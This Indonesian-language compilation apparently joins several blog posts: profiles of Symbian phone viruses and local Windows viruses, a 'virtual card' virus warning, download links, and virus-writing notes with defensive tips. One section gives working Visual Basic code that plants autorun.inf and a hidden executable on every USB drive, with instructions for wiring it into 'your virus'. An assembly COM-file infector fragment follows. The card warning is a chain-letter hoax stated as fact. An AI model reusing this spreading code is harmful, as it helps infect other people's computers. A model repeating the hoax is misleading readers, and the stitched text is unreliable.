Saat ini varian Commwarrior terakhir adalah Commwarrior T. Commwarrior T dan Q hanya menginfeksi Symbian versi 8.1 atau yang lebih tua.
Selain menyebar secara sporadis, virus ini juga akan membuka halaman html di ponsel Anda dengan pesan:
Introduction Surprise! Your phone infected by CommWarrior worm v3.0. Matrix has you, Commwarrior inside. No panic please, is it very interesting to have mobile virus at own phone. This worm does not bring any harm to your phone and your significant data. About CommWarrior
wor for Nokia Series 60 provides automatic real-time protection against harmful Anti-Virus content. CommWarrior is free software and is distributed in the hope that it wil be useful, without anya warranty. Thank you for using CommWarrior.CommWarrior 2005-2006 by e10d0r. 

3. SKULLS

Virus selanjutnya adalah virus bernama Skulls atau nama lengkapnya SymbOS.skulls. Skulls yang tergolong Trojan ini yang mengganti sistem di dalam ponsel dan menyebabkan ikon-ikon menu utama berubah menjadi gambar tengkorak. Awalnya, Trojan ini bernama Extended theme. akan tetapi sekarang banyak ditemui dengan nama skull.sis.
Beberapa varian jenis virus ini telah tersebar. Pada varian skulls.A entah mengapa dia tidak memberikan efek apa-apa. Namun skulls.C dan H dan S, hampir semua ikonnya berubah menjadi tengkorak. Saat instalasi varian Skull H, memunculkan kalimat notifikasi “Install ‘beta’_092_free-sms-RM8″ sedangkan Skull S menampilkan kalimat “Install BlueNum Stealer”.
Tak hanya merubah ikon, skulls juga mampu melumpuhkan aplikasi-aplikasiyang ikonnya dirubah tadi. Umumnya saat kita memencet ikon uatu aplikasi maka yang muncul adalah pesan system eror. 

4. DOOMBOOT

Meski penyebarannya tak seganas virus computer, namun kerusakan yang ditimbulkan oleh Doomboot tergolong cukup serius. Nama lengkapnya SymbOS.Doombot. Virus ini juga memiliki nama samaran antara lain Doomboot [F-Secure], SYMBOS_DOOMED [TrendMicro].
Saat ini varian doombot bermacam-macam. Ada Doomboot A, C, L, M, G dan P. Doomboot termasuk virus kategori Trojan. Varian Doomboot.A menaruh dan membuat file-file korup dan bahayanya, setelah ponsel menginfeksi, ia akan menempatkan virus lainnya semisal Commwarrior.B ke dalam ponsel Anda. Sistem file yang korup tadi menyebabkan ponsel tidak dapat melakukan booting.
SymbOS.Doomboot.A misalnya, menyusup ke ponsel Anda dengan menyerupai file instalasi permainan Doom2 yang telah dicrack. Biasanya bernama Doom_2_wad_cracked_by_DFT_S60_v1.0.sis. Sedangkan Doomboot C menyusup dengan nama samaran “exoVirusStopv 2.13.19″,
mirip dengan nama anti virus ponsel. Jika menerima file tersebut dan menginstalnya, Anda tidak akan menerima pesan teknis apapun setelah itu. Anda juga tak akan mengira bahwa ponsel telah terinfeksi karena tak ada ikon atau tanda apapun setelah proses instalasi.

5. APPDISBLER

Kinerja AppDisabler sebenarnya mirip dengan Doomboot. Dia akan menaruh file-file virus lain seperti Locknut B dan Cabir Y ke dalam sistem ponsel Anda. AppDisabler juga menggandeng Skulls J dan akan menyulap ikon-ikon sistem Anda menajadi gambar tengkorak. Yang lebih mengerikan, virus ini akan menghentikan kinerja sistem operasi dan juga beberapa aplikasi pihak ketiga.

 

6. CARDTRAP

CardTrap merupakan virus ponsel pertama yang mencoba menginfeksi computer berbasis Windows dengan menaruh 2 file virus ke dalam kartu memori ponsel. Jika terkoneksi kartu tersebut sewaktu-waktu menginfeksi computer.
Varian CardTrap lumayan banyak. Dari varian berhuruf tunggal seperti CardTrap P, Q, R, S hingga varian beraksara ganda sepert CardTrap AA, AG, AJ dan seterusnya.
Biasanya CardTrap menyaru dengan memakai nama-nama game atau aplikasi terkenal seperti Kingkong, Half Life, Battefield 2 dan lain-lain.
CardTrap Z misalnya, menyaru dengan nama SeleQ 1.7 – CrackedTNT.sis.
CardTrap merusak sistem dengan cara mematikan beberapa aplikasi built in Symbian. Virus ini juga cukup canggih sehingga mampu melumpuhkan beberapa jenis anti virus. Selanjutnya, jikalau ada kesempatan untuk terkoneksi ke computer, CardTrap akan berupaya menanam virus ke dalam PC berbasis Windows.
Beberapa varian seperti CardTrap Z juga dapat mematikan fungsi keypad, mengacaukan aplikasi-aplikasi pihak ketiga, dan menyebarkan filefile rusak ke dalam kartu memori hingga mengakibatkan kekacauan sistem.

Mengenal Virus-Virus Dudul.. ( Part I )

:

1. Rieysha varian

 

Satu lagi varian dari virus Rieysha, dikenal sebagai Rieysha-Prisa. Dibuat masih menggunakan Visual Basic, dan memiliki ukuran tubuh sebesar 34.304 bytes dalam kondisi di-pack menggunakan UPX. Icon virus ini menyerupai icon default sebuah file gambar pada Windows XP, seperti contohnya .JPG. Maka dari itu, ia akan membuat banyak sekali file duplikat untuk menipu user, hingga akan mengakibatkan free space harddisk Anda berkurang. Dengan tidak tersedianya free space yang cukup di harddisk, dapat mengakibatkan Windows tidak dapat running. User juga dapat mengetahui dengan cepat apakah komputernya terinfeksi oleh virus ini apa tidak dengan melihat status jam di pojok kanan bawah, karena biasanya virus ini akan menggantikan tulisan AM/PM menjadi rieysha.

2. Windx-Maxtrox

 

Virus yang dibuat dengan Visual Basic ini memiliki ukuran tubuh asli sekitar 77Kb, tanpa di-pack. Virus yang diduga kuat berasal dari daerah Sulawesi Utara ini memiliki kemampuan infeksi file executable. Tepatnya, ia akan menginfeksi program yang ada di direktori Program Files. Teknik infeksi yang cukup cerdik ia terapkan untuk menghindari pendeteksian engine heuristic dari antivirus. Ciri khas yang dapat dikenali pada komputer terinfeksi adalah berubahnya gambar wallpaper dari desktop menjadi gambar animasi, Maxtrox. 

 

3. Bungas.vbs

Virus lokal jenis VBScript ini memiliki ukuran tubuh sebesar 7222 bytes. Ia hadir dalam kondisi beberapa string terenkripsi, tentunya untuk menyulitkan pendeteksian dan proses analisa. Menariknya, rutin decryptornya tidak diperlihatkan begitu saja pada source nya, tapi sedikit ia sembunyikan. Virus ini menyebar melalui flash disk, tentunya juga memanfaatkan autorun dari flashdisk. File autorun.inf ia rancang sedemikian rupa, jadi saat user mengakses drive flash disk atau melihat properties dari drive flash disk, virus ini akan aktif.

4. Buxto varian

Virus ini dibuat menggunakan Visual basic. Pada salah satu variannya, seperti contohnya Buxto.C, ia memiliki ukuran tubuh sebesar 266.240 bytes, tanpa di-pack. Icon virus ini menyerupai icon aplikasi browser Mozilla Firefox. Virus ini dikenal dapat membuat autorun di setiap drive yang ia temui untuk dapat menyebar. Dan satu hal, pesan yang disampaikan oleh virus ini cukup nyeleneh, seperti layaknya sebuah pesan iklan.

5. HelloBaby

Saat menyebar, ia akan membuat file Desktop.ini dan autorun.inf dengan attribut hidden dan system. File tersebut akan disebarnya ke setiap drive yang ia temukan pada komputer terinfeksi. Ia juga akan berusaha untuk menyebarkan dirinya pada jaringan setempat dengan sebelumnya telah mematikan fasilitas firewall milik Windows. Pada komputer terinfeksi, akan terdapat beberapa file induk virus. Diantaranya, pada direktori System32, akan ada file dengan nama wmiprvse.exe dan mgrShell.exe, lalu file inti ini akan men-drop file lainnya dari dalam tubuhnya pada direktori Temp dengan nama ctfmon.exe dan pada direktori Windows dengan nama svchost.exe. Dan untuk mempercepat aksi penyebarannya, virus ini pun men-set registry NoDriveTypeAutoRun agar mendukung autorun pada floppy disk.

6. Virgear

Ia hadir dengan icon yang mirip dengan file multimedia milik WinAmp. Varian B memiliki ukuran file 49.152 bytes, tanpa di-pack. Sementara itu, varian C yang kami temukan, memiliki ukuran file sebesar 19.968 bytes, dan di-pack menggunakan UPX. Seperti yang lalu, ia akan menggantikan seluruh file multimedia yang ia temukan seperti MP3, 3GP, AVI, WMV, ASF, MPG, MPEG, MP4, pada komputer korban dengan dirinya sendiri, dengan menggunakan nama yang hampir sama, hanya ditambahkan extension .EXE di akhirnya. Virus ini juga akan mengubah setingan di registry untuk mendukung kelangsungan hidupnya, seperti menyembunyikan Folder Options, mem-blok Regedit, System Restore, dan lainnya. Diketahui, Virgear juga mencoba untuk mem-blok antivirus dan virus lain. Untuk itu, rename (ubah nama) dari PCMAV-CLN.exe sebelum Anda menggunakannya, misalkan menjadi 123456.exe. Dan, pada komputer terinfeksi, ia akan menampilkan kalimat “++++ Makanya jangan handak buka BF ja, neh rasain oleh2 dari amang hacker ++++” pada caption Internet Explorer.

7. Plolonk

Virus produksi lokal yang satu ini dibuat menggunakan Visual Basic, dengan ukuran sebesar 67.072 byte dengan kondisi di-packscramble. Di registry, ia menciptakan item run baru di HKLM, dengan nama service yang menunjuk pada salah satu file induknya yang ada di direktori Windows dengan nama dllhost.exe. Selain itu, pada direktori tersebut dapat ditemukan pula sebuah file gambar yang akan dijadikan wallpaper olehnya dengan nama Pl0Lonx.jpg. Jadi pada komputer terinfeksi, wallpaper desktop dari komputer tersebut akan ia ubah menjadi gambar bertemakan “Linux SuSE”. Selain itu, untuk dapat aktif otomatis, ia juga menempatkan dirinya pada folder StartUp dengan nama Empty.pif. yang kemungkinan besar menggunakan UPX yang di-

8. Autorunme

Virus yang bukan produksi programer lokal ini memiliki ukuran sebesar 26.835 bytes, dan diperkirakan di-pack menggunakan PECompact. Ia tidak memiliki icon, hanya menggunakan icon standar applications dari Windows. Saat menginfeksi, ia mencoba untuk menanamkan file induknya pada direktori C:\Windows\System dengan nama msvc32s.exe dan dengan attribut hidden dan system, serta membuat autorun baru di registry dengan nama “Windows msvc Control Centers”. Virus yang dapat menyebar melalui media penyimpan data seperti flash disk ini juga dapat menyebar melalui aplikasi Instant Messaging. Pada flash disk, ia akan membuat folder tiruan Recycle Bin yang berisi file dengan nama autorunme.exe, lalu mengarahkan autorun.inf untuk menjalankan file virus tersebut. Jadi, saat user mencolokan flash disk tersebut lalu mengakses drive yang dimaksud, virus tersebut akan aktif.

9. Microso varian

Virus ini hadir dengan 3 buah file, yakni MicroSoft.pif, MicroSoft.bat, dan MicroSoft.vbs. Ketiga file tersebut saling terkait. Namun, ada satu file yang merupakan induk dari ketiganya, yakni MicroSoft.pif. Pada salah satu variannya, ia memiliki ukuran file sebesar 18.432 bytes. Virus luar ini saat beraksi akan mengeluarkan beberapa file .DLL dari dalam tubuhnya yakni Jview.dll dan AcXtrnel.dll yang akan mencoba aktif dengan menginjeksikan pada explorer.exe atau dijalankan melalui Rundll32.exe.

10. Kalong.vbs varian

Virus jenis VBScript ini telah lumayan lama malang melintang. Variannya sudah mencapai Kalong.vbs.G. Perubahan yang dilakukan tiap varian tidak terlalu signifikan. Contohnya Kalong.vbs.E. Virus yang memiliki ukuran tubuh sebesar 5.908 bytes ini, dalam aksinya akan membuat file autorun.inf di setiap root drive yang ia temukan, tentunya untuk mempermudahnya dalam melakukan penyebaran. Selain file itu, Anda juga akan menemukan file dengan nama k4l0n62.sys.vbs, tentunya dengan attribut hidden. Pada komputer terinfeksi, ia pun akan menampakan kehadirannya pada caption Internet Explorer, dengan mengubahnya menjadi kata-kata cacian berbau pornografi.

VIRUS BARU YANG SANGAT MERUSAK DI AWAL TAHUN 2010

Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang paling merusak! Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.

Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut:

• Secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul “Sebuah Kartu Untuk Anda”(Une Carte Pour Vous, atau A Card For You);
  
• Begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.

Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New York . Peringatan ini telah diterima oleh pegawai Microsoft sendiri.

Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” ( Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).

Awas!!!

Jangan terima kontak “pti_bout_de_ chou @hotmail.com” . Ini virus yang akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda. Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer anda juga akan terkena.

Mengenal Virus (Donlot PDF)

Semua dalam bahasa Indonesia http://www.ziddu.com/download/6011844/mengamankan-komputer-dari-virus.pdf.html http://www.ziddu.com/download/5993846/ModalDasarMenghadapiVirus.pdf.html http://www.ziddu.com/download/5993798/SemuanyaTentangVirus.pdf.html

Code Infeksi USB

Code:

Public Function InfeksiUSB(DigitalCat As String, AD As String) Dim FSO, USBCatLER, USBCat Set FSO = CreateObject("SCRIPTING.FILESYSTEMOBJECT") Set USBCatLER = FSO.DRIVES For Each USBCat In USBCatLER If USBCat.DRIVETYPE = 1 Then 'EGER SILINEBILIR ISE If Right(YOL, 1) <> "\" Then DigitalCat= DigitalCat& "\" If DigitalUSB(USBCat & "\autorun.inf") Then SetAttr USBCat & "\autorun.inf", 0 Kill USBCat & "\autorun.inf" End If Open USBCat & "\autorun.inf" For Append As #1 Print #1, "[autorun]" & vbCrLf & _ "open=" & USBCat & "\" & AD Close #1 If Not DigitalUSB(USBCat & "\" & AD) Then FileCopy DigitalCat& AD, USBCat & "\" & AD End If SetAttr USBCat & "\" & AD, 4 SetAttr USBCat & "\autorun.inf", 4 SetAttr USBCat & "\" & AD, 2 SetAttr USBCat & "\autorun.inf", 2 End If Next End Function Public Function DigitalUSB(DosyaAdi As String) As Boolean On Error GoTo CekUSB Call FileLen(DosyaAdi) DigitalUSB = True Exit Function CekUSB: End Function Sub Main() InfeksiUSB App.Path, App.EXEName & ".exe" End Sub Cara Pakai : Pada code ini (ada .exe,-> letakkan nama virus kamu bisa jg diganti *.Vbs,etc..) InfeksiUSB App.Path, App.EXEName & ".exe" pada form load / dimana code virus kamu letakkan untuk mengaktifkan virus kamu cukup gunakan / panggil

Code:

call InfeksiUSB

jika code ini di letakkan di module : gunakan code ini :

Code:

NamaModule.InfeksiUSB

VIRUS SCRIPT

Cara Kerja Virus Script : Karena virus jenis ini biasanya terdapat pada file HTML maka virus ini akan beraksi setiap kali kita menjelajah internet denganprogram internet browser yang mendukung script tersebut. Program browser yang sering menjadi target adalah Microsoft Internet Explorer dan Netscape Navigator. File virus scirpt apabila dijalankan oleh browser yang mendukung Javascript maka akan berakibat komputer akan membuka banyak sekali browser hingga tidak terhingga sampai nantinya komputer akan mengalami hang atau crash. Sebab instruksi dari Javascript tertentu adalah untuk memanggil diri sendiri tanpa pernah berhenti. Penanggulangannya : - Tingkatkan options security dari browser setiap kali kita merasa memasuki alamat internet yang berbahaya. - Set agar setiap kali browser menemukan suatu script agar selalu muncul pilihan apakah script itu ingin dijalankan atau tidak. Jadi kita bisa menyelidiki terlebih dahulu apakah sisi dari script tersebut berbahaya. - Set atribut menjadi read-only untuk file-file yang rawan dan memegang kendali penting seperti : AUTOEXEC.BAT; DOSSTART.BAT dan sebagainya. - Ubah nama program file yang rawan dan memegang kendali penting menjadi tidak standar seperti : FORMAT.EXE;DEBUG.EXE ; DELTREE.EXE dan sebagainy. - Periksa secara rutin registry Windows di bagian \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, apakah menemukan sesuatu yang mencurigakan jika menemukan itu hapus bagian yang mencurigakan itu. - Selalu membuat file cadangan dari registry Windows. Semoga bermanfaat..

Cara Kerja Virus Executable Seperti telah diketahui bahwa virus executable adalah virus yang dibuat dengan compiler dan bahasa pemrograman. Berikut ini beberapa cara kerja virus : - File executable yang terkena virus apabila dieksekusi akan masuk ke dalam memori (dikenal sebagai worm) dan kemudian akan menginfeksi seluruh file exectuble di directory aktif, atau virus akan menginfeksi file executable lain apabila file lain tersebut dieksekusi. - Virus yang aktif akan masuk ke dalam boot sector media penyimpanan, kemudian apabila komputer melakukan proses booting dengan media penyimpanan tersebut maka virus akan aktif. - Untuk virus resident instruksi manipulasi akan diletakkan di memori, lalu virus ini akan menunggu kesempatan untuk mengaktifkan bagian virus yang bersifat merusak. Biasanya virus jenis ini hanya akan aktif kembali apabila kita mengeksekusi file yang tertular virus tersebut. - Apabila virus bersifat menumpangi file maka virus akan merusak file asli sehingga tidak dapat berfungsi normal, tetapi apabila virus mengadakan rutin manipulasi maka virus akan diletakkan di akhir file sehingga tidak merusak file. - Biasanya virus mengadakan manipulasi dengan vektor interupsi dengan membelokkan vektor interupsi maka setiap terjadi Pemanggilan interupsi tertentu yang dijalankan terlebih dahulu adalah program virus tersebut. Berikut ini adalah contoh sebagian dari isi virus yang dibuat dalam bahasa assembly : ;– cek exe/sudah kena mov ax,word ptr Buf cmp ax,4D5Ah jz Usai2 cmp ax,5A4Dh jz Usai2 6 cmp byte ptr Buf+3,’W’ jz Usai2 Tular: ;– ke ujung file mov ax,4202h xor cx,cx cwd int 21h jc Usai2 or dx,dx jnz Usai2 sub ax,3 push ax ;– tulis mov ah,40h mov cx,offset Batas-100h mov dx,offset Mulai int 21h jc Usai2 pop Lom mov ax,4200h xor cx,cx Setelah diperhatikan ternyata virus ini bertujuan untuk menginfeksi file COM, virus juga menyediakan tempat sebanyak 244 bytes sebagai tempat dirinya berada di ujung file korban. Virus ini akan membelokkan vektor interupsi 21h dengan procedure yang telah diciptakan sendiri oleh virus, selain itu virus ini juga melakukan proses enkripsi dengan operator bit XOR untuk mengacak badan virus yang terdapat pada file korban sehingga tidak mudah dilacak. Walaupun virus ini tidak berbahaya seperti virus CIH yang dapat menghapus BIOS (Basic Input Output System) tetapi virus ini cukup merugikan karena dapat merusak file. Penanggulangannya: - Ubah program-program atribut menjadi Read Only Sebenarnya cara ini kurang menjamin sebab sudah ada virus yang bisa mengubah attribut file. Tetapi cara ini lebih baik dilakukan daripada tidak sama sekali. Parameter untuk merubah attribut file : ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] [[drive:][path]filename] [/S] Keterangan : + : menambahkan attribut - : menghilangkan attribut R : attribut hanya baca (Read only) A : attribut file archive S : attribut file aystem H : attribut file tersembunyi Path : nama cabang (sub-directory) Filename: nama file yang akan diproses /S : melakukan proses diseluruh directory dan sub-directory - Hindari penggunaan disket-disket/Flash Disk yang tidak bisa dipercaya sumbernya. Usahakan untuk tidak menggunakan disket-disket yang sudah lama sebab mungkin saja mengandung virus, dan juga jangan sembarangan menggunakan disket/Flash Disk dari orang lain yang tidak terjamin kebersihan disket dari virus. - Melakukan Write Protect Dengan selalu mengunci Write Protect disket/Flash Disk maka, kita dapat lebih meminimalkan kemungkinan penularan virus sebab virus tidak bisa menulis pada disket yang telah di-Write Protect. - Membuat sub-directory untuk program-program baru. Hal ini bisa melokalisir beberapa virus apabila program kita terjangkit virus. Cara membuat sub-directory : MD [drive:]path Cara berpindah sub-directory : CD [drive:]path - Scan virus setiap disket/Flash Disk yang tidak pasti kebersihannya dari virus. Apabila kita terpaksa untuk menggunakan disket yang tidak diketahui kebersihannya, maka sebaiknya kita melakukan pemeriksaan terlebih dahulu dengan antivirus. Contoh-contoh program antivirus yang cukup terkenal adalah Avira, McAfee VirusScan, Antiviral Toolkit Pro, dan Norton Antivirus - Melakukan scan virus secara periodik pada hard disk. Walaupun kita telah menjaga segala kemungkinan dari penyebaran virus, tetapi ada baiknya dilakukan pemeriksaan pada hard disk, sebab mungkin saja terdapat virus baru atau variasi virus yang belum bisa terdeteksi. - Menginstal program resident pada komputer. Untuk mencegah dan mendeteksi kerja virus kita bisa menggunakan program antivirus yang sifatnya resident, yang dimaksud dengan residen adalah program yang menetap sementara pada memori komputer. Contoh program residen adalah Scan McAfee Vshield dan Norton Anti Virus. - Menggunakan program anti virus yang terbaru Memang seharusnya apabila kita ingin memperkecil kemungkinan penularan virus, kita harus selalu mengikuti perkembangan program anti virus sebab dengan semakin banyaknya virus-virus baru yang belum bisa terdeteksi oleh antivirus yang lama, sehingga para pencipta program anti virus juga membuat program anti virus yang lebih baru pula. - Periksa secara rutin registry Windows di bagian \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, apakah menemukan sesuatu yang mencurigakan jika menemukan itu hapus bagian yang mencurigakan itu. Semoga bermanfaat..